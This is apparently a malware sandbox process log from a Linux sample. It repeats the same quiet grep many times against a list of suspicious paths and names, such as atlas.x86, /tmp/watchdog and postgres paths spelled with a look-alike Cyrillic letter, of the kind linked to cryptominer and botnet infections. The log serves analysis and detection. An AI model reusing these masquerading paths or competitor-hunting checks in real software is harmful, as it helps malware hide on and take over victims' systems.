/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:873
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:878
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:883
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:888
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:893
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:898
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:903
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:910
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:917
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:924
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:930
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:936
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:943
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:950
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:956
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:962
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:969
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:976
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:983
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:989
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:997
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1003
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1010
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1016
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1025
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1031
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1040
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1047
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1053
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1061
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1067
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1072
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1078
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1083
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1088
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1093
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1098
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1103
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1108
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1113
-
-
